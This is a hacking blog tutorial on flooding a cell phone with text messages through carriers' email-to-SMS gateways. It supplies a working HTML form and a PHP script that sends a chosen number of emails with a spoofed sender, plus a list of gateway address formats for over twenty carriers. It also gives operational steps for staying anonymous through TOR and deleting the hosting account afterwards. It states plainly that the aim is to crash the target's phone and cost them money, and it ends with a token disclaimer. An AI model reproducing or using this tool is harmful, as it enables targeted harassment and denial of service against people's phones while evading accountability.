web stats

How to SMS Flood a Cell Phone

Flooding the inbox of a cell phone is much like flooding an email address – something which I covered in another guide which can be found by clicking the link below. In fact, this article covers exactly the same script and HTML code which I’ve written about in the other guide. However, this isn’t simply a copy – this guide is unique, and should teach you the basics of spamming a cell phone.

How to Flood an Email Inbox

So, how does the attacker prepare for a flooding?

Just as you’d expect, the attacker will need access to a free web-host which has PHP and a mail server. Freehostia has both. It’s safest to preserve anonymity by registering behind a TOR connection to hide your IP address – something which an attacker should be very concerned with!

The Email Spamming Form

This isn’t totally necessary, but it helps you get a visual idea of what’s going into the script. The HTML form can be used to enter various fields, such as the target email address, the message which will be sent, and the number of times the email is sent. The attacker should create a page on their website which has the following code in;

Code:
<form action="script.php" method="POST">
To: <input type="text" name="to" /> <br />
Subject: <input type="text" name="subject" /> <br />
Message: <input type="text" name="message" /> <br />
From: <input type="text" name="from" /> <br />
Times To Send: <input type="text" name="sendtimes" /> <br />
<input type="submit" value="Send!" />
</form>

The Email Spamming Script

Once the HTML form is in place, the attacker needs to create a script called “script.php” which takes everything entered into the form and places it inside a script using variables. The script then runs, sending emails to the target and potentially flooding the living shit out of them! Here’s what the script looks like;

Code:
<?php
$number = 0;
$to = $_POST['to'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$from = $_POST['from'];
$headers = "From: $from";
$sendtimes = $_POST['sendtimes'];

while ($number < $sendtimes) {
$number++;
mail($to,$subject,$message,$headers);
}
echo "Mail Sent $sendtimes times!";
?>

The script is written in PHP. It uses a loop to control how many times the email is sent. Basically, so long as the value of $number is less than $sendtimes, the script will loop over. Once $number is equal to or greater than $sendtimes, the script will stop running.

How to find out the email address of a cell phone

When an email is sent to a cell phone directly, it will appear as a text message. This is a serious flaw, seeing as we now have the ability to send as many emails as we want! Sending hundreds, thousands or even MILLIONS of emails to a phone WILL fuck it up. It can crash the phone, cost the target money, and possibly get them cut off while the provider sorts out the mess.

Below is a list of carriers and the email addresses associated with them. This list is taken from here – thanks for providing it.

Alltel
[10-digit phone number]@message.alltel.com
Example: [email protected]

AT&T (formerly Cingular)
[10-digit phone number]@txt.att.net
Example: [email protected]

For multimedia messages, use [10-digit-number]@mms.att.net
Example: [email protected]

Boost Mobile
[10-digit phone number]@myboostmobile.com
Example: [email protected]

Cricket Wireless
[10-digit phone number]@sms.mycricket.com
Example: [email protected]

For multimedia messages: [10-digit phone number]@mms.mycricket.com
Example: [email protected]

Nextel (now part of Sprint Nextel)
[10-digit telephone number]@messaging.nextel.com
Example: [email protected]

Sprint (now Sprint Nextel)
[10-digit phone number]@messaging.sprintpcs.com
Example: [email protected]

T-Mobile
[10-digit phone number]@tmomail.net
Example: [email protected]

Verizon
[10-digit phone number]@vtext.com
Example: [email protected]

Virgin Mobile USA
[10-digit phone number]@vmobl.com
Example: [email protected]

Bell Canada: [10-digit-phone-number]@txt.bellmobility.ca

Centennial Wireless: [10-digit-phone-number]@cwemail.com

Cellular South: [10-digit-phone-number]@csouth1.com

Cincinnati Bell: [10-digit-phone-number]@gocbw.com

Metro PCS: [10-digit-phone-number]@mymetropcs.com or [10-digit-phone-number]@metropcs.sms.us

Qwest: [10-digit-phone-number]@qwestmp.com

Rogers: [10-digit-phone-number]@pcs.rogers.com

Suncom: [10-digit-phone-number]@tms.suncom.com

Telus: [10-digit-phone-number]@msg.telus.com

U.S. Cellular: [10-digit-phone-number]@email.uscc.net

Once the attacker has got his email address ready, he would then be ready to get flooding! The safest way of doing this is as follows;

  • Using TOR, access the free website.
  • Enter the required details into the form, specifying how many times to send the email.
  • Wait for the confirmation!
  • Delete the website, and the account.

Additional Notes

I don’t support the use of this script in any way, nor do I claim it as mine. It’s just some PHP code – remember that. If you decide to be an idiot and spam someone without their permission, then it’s absolutely nothing to do with me. I hope you enjoyed it!

 

Discuss

Leave a Reply